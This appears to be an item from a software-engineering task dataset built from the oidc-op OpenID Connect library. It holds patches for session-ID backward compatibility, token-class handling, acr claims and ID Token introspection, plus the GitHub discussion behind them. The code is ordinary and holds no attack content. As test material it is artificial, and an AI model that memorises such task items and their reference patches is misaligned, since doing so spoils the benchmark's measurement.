session_id: str,
@@ -221,6 +230,10 @@ def payload_arguments(
user_info = endpoint_context.claims_interface.get_user_claims(user_id, _claims_restriction)
payload.update(user_info)
+ # Should I add the acr value
+ if self.add_acr_value(claims_release_point):
+ payload["acr"] = self.authentication_event["authn_info"]
+
return payload
def mint_token(
diff --git a/src/oidcop/session/manager.py b/src/oidcop/session/manager.py
index fde11af8..b8129904 100644
--- a/src/oidcop/session/manager.py
+++ b/src/oidcop/session/manager.py
@@ -38,7 +38,7 @@ def __init__(self, salt: Optional[str] = "", filename: Optional[str] = ""):
if os.path.isfile(filename):
self.salt = open(filename).read()
elif not os.path.isfile(filename) and os.path.exists(
- filename
+ filename
): # Not a file, Something else
raise ConfigurationError("Salt filename points to something that is not a file")
else:
@@ -73,8 +73,10 @@ class SessionManager(Database):
init_args = ["handler"]
def __init__(
- self, handler: TokenHandler, conf: Optional[dict] = None, sub_func: Optional[dict] = None,
+ self, handler: TokenHandler, conf: Optional[dict] = None,
+ sub_func: Optional[dict] = None,
):
+ super(SessionManager, self).__init__()
self.conf = conf or {}
# these won't change runtime
@@ -125,9 +127,9 @@ def __setattr__(self, key, value):
def _init_db(self):
Database.__init__(
- self,
- key=self.load_key(),
- salt=self.load_salt()
+ self,
+ key=self.load_key(),
+ salt=self.load_salt()
)
def get_user_info(self, uid: str) -> UserSessionInfo:
@@ -153,14 +155,14 @@ def find_token(self, session_id: str, token_value: str) -> Optional[SessionToken
return None # pragma: no cover
def create_grant(
- self,
- authn_event: AuthnEvent,
- auth_req: AuthorizationRequest,
- user_id: str,
- client_id: Optional[str] = "",
- sub_type: Optional[str] = "public",
- token_usage_rules: Optional[dict] = None,
- scopes: Optional[list] = None,
+ self,
+ authn_event: AuthnEvent,
+ auth_req: AuthorizationRequest,
+ user_id: str,
+ client_id: Optional[str] = "",
+ sub_type: Optional[str] = "public",
+ token_usage_rules: Optional[dict] = None,
+ scopes: Optional[list] = None,
) -> str:
"""
@@ -175,14 +177,16 @@ def create_grant(
"""
sector_identifier = auth_req.get("sector_identifier_uri", "")
+ _claims = auth_req.get("claims", {})
+
grant = Grant(
authorization_request=auth_req,
authentication_event=authn_event,
- sub=self.sub_func[sub_type](
- user_id, salt=self.salt, sector_identifier=sector_identifier
- ),
+ sub=self.sub_func[sub_type](user_id, salt=self.salt,
+ sector_identifier=sector_identifier),
usage_rules=token_usage_rules,
scope=scopes,
+ claims=_claims
)
self.set([user_id, client_id, grant.id], grant)
@@ -190,14 +194,14 @@ def create_grant(
return self.encrypted_session_id(user_id, client_id, grant.id)
def create_session(
- self,
- authn_event: AuthnEvent,
- auth_req: AuthorizationRequest,
- user_id: str,
- client_id: Optional[str] = "",
- sub_type: Optional[str] = "public",
- token_usage_rules: Optional[dict] = None,
- scopes: Optional[list] = None,
+ self,
+ authn_event: AuthnEvent,
+ auth_req: AuthorizationRequest,
+ user_id: str,
+ client_id: Optional[str] = "",
+ sub_type: Optional[str] = "public",
+ token_usage_rules: Optional[dict] = None,
+ scopes: Optional[list] = None,
) -> str:
"""
Create part of a user session. The parts added are user- and client
@@ -309,10 +313,10 @@ def revoke_token(self, session_id: str, token_value: str, recursive: bool = Fals
self._revoke_dependent(grant, token)
def get_authentication_events(
- self,
- session_id: Optional[str] = "",
- user_id: Optional[str] = "",
- client_id: Optional[str] = "",
+ self,
+ session_id: Optional[str] = "",
+ user_id: Optional[str] = "",
+ client_id: Optional[str] = "",
) -> List[AuthnEvent]:
"""
Return the authentication events that exists for a user/client combination.
@@ -371,10 +375,10 @@ def revoke_grant(self, session_id: str):
self.set(_path, _info)
def grants(
- self,
- session_id: Optional[str] = "",
- user_id: Optional[str] = "",
- client_id: Optional[str] = "",
+ self,
+ session_id: Optional[str] = "",
+ user_id: Optional[str] = "",
+ client_id: Optional[str] = "",
) -> List[Grant]:
"""
Find all grant connected to a user session
@@ -395,13 +399,13 @@ def grants(
return [self.get([user_id, client_id, gid]) for gid in _csi.subordinate]
def get_session_info(
- self,
- session_id: str,
- user_session_info: bool = False,
- client_session_info: bool = False,
- grant: bool = False,
- authentication_event: bool = False,
- authorization_request: bool = False,
+ self,
+ session_id: str,
+ user_session_info: bool = False,
+ client_session_info: bool = False,
+ grant: bool = False,
+ authentication_event: bool = False,
+ authorization_request: bool = False,
) -> dict:
"""
Returns information connected to a session.
@@ -448,14 +452,21 @@ def get_session_info(
return res
+ def _compatible_sid(self, sid):
+ # To be backward compatible is this an old time sid
+ p = self.unpack_session_key(sid)
+ if len(p) == 3:
+ sid = self.encrypted_session_id(*p)
+ return sid
+
def get_session_info_by_token(
- self,
- token_value: str,
- user_session_info: bool = False,
- client_session_info: bool = False,
- grant: bool = False,
- authentication_event: bool = False,
- authorization_request: bool = False,
+ self,
+ token_value: str,
+ user_session_info: bool = False,
+ client_session_info: bool = False,
+ grant: bool = False,
+ authentication_event: bool = False,
+ authorization_request: bool = False,
) -> dict:
_token_info = self.token_handler.info(token_value)
sid = _token_info.get("sid")
@@ -464,6 +475,9 @@ def get_session_info_by_token(
if not sid:
raise WrongTokenClass
+ # To be backward compatible is this an old time sid
+ sid = self._compatible_sid(sid)
+
return self.get_session_info(
sid,
user_session_info=user_session_info,
@@ -475,7 +489,8 @@ def get_session_info_by_token(
def get_session_id_by_token(self, token_value: str) -> str:
_token_info = self.token_handler.info(token_value)
- return _token_info["sid"]
+ sid = _token_info.get("sid")
+ return self._compatible_sid(sid)
def add_grant(self, user_id: str, client_id: str, **kwargs) -> Grant:
"""
diff --git a/src/oidcop/token/__init__.py b/src/oidcop/token/__init__.py
index b3309afa..a9bcd791 100755
--- a/src/oidcop/token/__init__.py
+++ b/src/oidcop/token/__init__.py
@@ -15,6 +15,13 @@
logger = logging.getLogger(__name__)
+ALT_TOKEN_NAME = {
+ "authorization_code": "A",
+ "access_token": "T",
+ "refresh_token": "R",
+ "id_token": "I"
+}
+
def is_expired(exp, when=0):
if exp < 0:
@@ -28,6 +35,11 @@ def is_expired(exp, when=0):
class Token(object):
def __init__(self, token_class, lifetime=300, **kwargs):
self.token_class = token_class
+ try:
+ self.alt_token_name = ALT_TOKEN_NAME[token_class]
+ except KeyError:
+ self.alt_token_name = ""
+
self.lifetime = lifetime
self.kwargs = kwargs
@@ -70,7 +82,8 @@ def __init__(self, password, token_class="", token_type="Bearer", **kwargs):
self.crypt = Crypt(password)
self.token_type = token_type
- def __call__(self, session_id: Optional[str] = "", token_class: Optional[str] = "", **payload) -> str:
+ def __call__(self, session_id: Optional[str] = "", token_class: Optional[str] = "",
+ **payload) -> str:
"""
Return a token.
@@ -112,9 +125,10 @@ def info(self, token: str) -> dict:
:return: dictionary with info about the token
"""
_res = dict(zip(["_id", "token_class", "sid", "exp"], self.split_token(token)))
- if _res["token_class"] != self.token_class:
+ if _res["token_class"] not in [self.token_class, self.alt_token_name]:
raise WrongTokenClass(_res["token_class"])
else:
+ _res["token_class"] = self.token_class
_res["handler"] = self
return _res
diff --git a/src/oidcop/token/jwt_token.py b/src/oidcop/token/jwt_token.py
index d002e416..1329f64d 100644
--- a/src/oidcop/token/jwt_token.py
+++ b/src/oidcop/token/jwt_token.py
@@ -6,11 +6,12 @@
from oidcop.exception import ToOld
from oidcop.token import Crypt
+from oidcop.token.exception import WrongTokenClass
+
from . import Token
from . import is_expired
from .exception import UnknownToken
-
# TYPE_MAP = {"A": "code", "T": "access_token", "R": "refresh_token"}
@@ -58,10 +59,11 @@ def __call__(self, session_id: Optional[str] = "", token_class: Optional[str] =
:param payload: A dictionary with information that is part of the payload of the JWT.
:return: Signed JSON Web Token
"""
- if not token_class and self.token_class:
- token_class = self.token_class
- else:
- token_class = "authorization_code"
+ if not token_class:
+ if self.token_class:
+ token_class = self.token_class
+ else:
+ token_class = "authorization_code"
payload.update({"sid": session_id, "token_class": token_class})
payload = self.load_custom_claims(payload)
@@ -86,14 +88,22 @@ def get_payload(self, token):
def info(self, token):
"""
- Return type of Token (A=Access code, T=Token, R=Refresh token) and
- the session id.
+ Return token information
:param token: A token
- :return: tuple of token type and session id
+ :return: dictionary with token information
"""
_payload = self.get_payload(token)
+ _class = _payload.get("ttype")
+ if _class is None:
+ _class = _payload.get("token_class")
+
+ if _class not in [self.token_class, self.alt_token_name]:
+ raise WrongTokenClass(_payload["token_class"])
+ else:
+ _payload["token_class"] = self.token_class
+
if is_expired(_payload["exp"]):
raise ToOld("Token has expired")
# All the token metadata
diff --git a/src/oidcop/user_authn/authn_context.py b/src/oidcop/user_authn/authn_context.py
index 661635ae..d49f5c0d 100755
--- a/src/oidcop/user_authn/authn_context.py
+++ b/src/oidcop/user_authn/authn_context.py
@@ -108,6 +108,19 @@ def default(self):
return None
+def _acr_claim(request):
+ _claims = request.get("claims")
+ if _claims:
+ _id_token_claim = _claims.get("id_token")
+ if _id_token_claim:
+ _acr = _id_token_claim.get("acr")
+ if 'value' in _acr:
+ return [_acr["value"]]
+ elif 'values' in _acr:
+ return _acr["values"]
+ return None
+
+
def pick_auth(endpoint_context, areq, pick_all=False):
"""
Pick authentication method
@@ -125,9 +138,8 @@ def pick_auth(endpoint_context, areq, pick_all=False):
acrs = areq["acr_values"]
else:
- try:
- acrs = areq["claims"]["id_token"]["acr"]["values"]
- except KeyError:
+ acrs = _acr_claim(areq)
+ if not acrs:
_ith = verified_claim_name("id_token_hint")
if areq.get(_ith):
_ith = areq[verified_claim_name("id_token_hint")]
| Clear txt sid
Session IDs in the old-style tokens were in clear text; not so in the new ones.
This takes care of the difference.
| 2021-07-04T13:30:03 | 0.0 | [] | [] |
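The backward-compatibility shim in this patch (`_compatible_sid`) can be sketched as follows, with a toy "encryption" standing in for the real session-ID crypto: an old-style clear-text sid splits into its three parts and is re-packed through the encrypting path, while a new-style sid passes through unchanged.

```python
# Sketch of the backward-compatibility shim. Toy crypto and separator;
# the real code uses unpack_session_key/encrypted_session_id.

SEP = ";;"


def toy_encrypt(user_id: str, client_id: str, grant_id: str) -> str:
    # Stand-in for encrypted_session_id(): reversible, recognizable prefix.
    return "enc:" + SEP.join([user_id, client_id, grant_id])


def unpack_session_key(sid: str):
    # Clear-text sids split into three parts; "encrypted" ones do not.
    return [sid] if sid.startswith("enc:") else sid.split(SEP)


def compatible_sid(sid: str) -> str:
    """Re-pack a clear-text (three-part) sid through the encrypting path."""
    parts = unpack_session_key(sid)
    if len(parts) == 3:
        return toy_encrypt(*parts)
    return sid


if __name__ == "__main__":
    old = "diana;;client_1;;grant_42"
    new = compatible_sid(old)
    print(new)
    print(compatible_sid(new) == new)  # already-encrypted sids pass through
```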
|||
IdentityPython/oidc-op | IdentityPython__oidc-op-81 | e4d59ab90bc953e9cad20f087184c04e21126e72 | diff --git a/src/oidcop/oauth2/introspection.py b/src/oidcop/oauth2/introspection.py
index de32f720..c298c12d 100644
--- a/src/oidcop/oauth2/introspection.py
+++ b/src/oidcop/oauth2/introspection.py
@@ -6,6 +6,7 @@
from oidcop.endpoint import Endpoint
from oidcop.token.exception import UnknownToken
+from oidcop.token.exception import WrongTokenClass
LOGGER = logging.getLogger(__name__)
@@ -94,7 +95,7 @@ def process_request(self, request=None, release: Optional[list] = None, **kwargs
_session_info = _context.session_manager.get_session_info_by_token(
request_token, grant=True
)
- except UnknownToken:
+ except (UnknownToken, WrongTokenClass):
return {"response_args": _resp}
grant = _session_info["grant"]
diff --git a/src/oidcop/session/manager.py b/src/oidcop/session/manager.py
index 4ca89870..fde11af8 100644
--- a/src/oidcop/session/manager.py
+++ b/src/oidcop/session/manager.py
@@ -18,6 +18,7 @@
from .info import ClientSessionInfo
from .info import UserSessionInfo
from ..token import UnknownToken
+from ..token import WrongTokenClass
from ..token.handler import TokenHandler
logger = logging.getLogger(__name__)
@@ -457,8 +458,13 @@ def get_session_info_by_token(
authorization_request: bool = False,
) -> dict:
_token_info = self.token_handler.info(token_value)
- sid = _token_info["sid"]
- session_info = self.get_session_info(
+ sid = _token_info.get("sid")
+ # If the token is an ID Token then the sid will not be in the
+ # _token_info
+ if not sid:
+ raise WrongTokenClass
+
+ return self.get_session_info(
sid,
user_session_info=user_session_info,
client_session_info=client_session_info,
@@ -466,7 +472,6 @@ def get_session_info_by_token(
authentication_event=authentication_event,
authorization_request=authorization_request,
)
- return session_info
def get_session_id_by_token(self, token_value: str) -> str:
_token_info = self.token_handler.info(token_value)
Problem statement: ID Token introspection

Currently, providing an ID Token to the introspection endpoint results in an unhandled exception.
@rohe @peppelinux What are our plans regarding using ID Tokens in the introspection endpoint?
IMO we should allow introspection of ID Tokens.
@nsklikas I think that an unhandled exception means a bug 😀
Add a unit test for this if you can, then we'll see what's going on.
I'm quite sure that an ID Token would be handled by token introspection, and more: every issued token should be handled. You have probably hit a bug; let's patch it!
Did you test this against https://github.com/IdentityPython/oidc-op/pull/74 ?
There is no support for introspection of ID Tokens at the introspection endpoint and there shouldn't be.
But it shouldn't result in an unhandled exception.
If @nsklikas wants this feature in, let's give him a chance.
It's quite trivial to get that information from a session Grant.
That's something for 2.1.0 if you agree. @nsklikas, would you go ahead in the meantime?
It's not that simple.
Remember that introspection is an OAuth2 feature, not an OIDC one, and that ID Tokens are an OIDC addition.
Introspection was invented because access tokens were supposed to be non-readable to the user.
ID Tokens are by definition readable by anyone and are not supposed to be used as access tokens.
This means that @nsklikas would have an OIDC-aware token introspection endpoint?
The sky is the limit 😎
Regarding the nature of the endpoint, yes, I agree it belongs to OAuth2, but @nsklikas, how would you deal with this?
Many providers out there support the introspection of ID Tokens. It's true that it's an OAuth2 endpoint and I don't know if we should support it as well.
I guess it would make sense to introspect encrypted ID Tokens (the client may not have the encryption key).
The reason it fails is that `get_session_info_by_token` expects to find the `session_id` in the token, but ID Tokens don't contain the session_id.

created_at: 2021-06-01T10:17:27
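The guard added in the patch above can be exercised in isolation. In this sketch the session store is stubbed as a dict and the function name is shortened; the body mirrors the diff, where a missing `sid` now raises `WrongTokenClass` instead of an unhandled `KeyError`:

```python
class WrongTokenClass(Exception):
    """The presented token (e.g. an ID Token) has no session id."""


def session_info_by_token(token_info, lookup):
    # Access and refresh tokens carry a "sid" claim pointing at the
    # session; ID Tokens do not. Signal that with a dedicated
    # exception the introspection endpoint can catch and turn into
    # an "inactive" response.
    sid = token_info.get("sid")
    if not sid:
        raise WrongTokenClass
    return lookup(sid)


sessions = {"sid-1": {"user": "alice", "active": True}}
print(session_info_by_token({"sid": "sid-1"}, sessions.get))
# {'user': 'alice', 'active': True}
try:
    session_info_by_token({"iss": "https://op.example"}, sessions.get)
except WrongTokenClass:
    print("not introspectable: no sid")
```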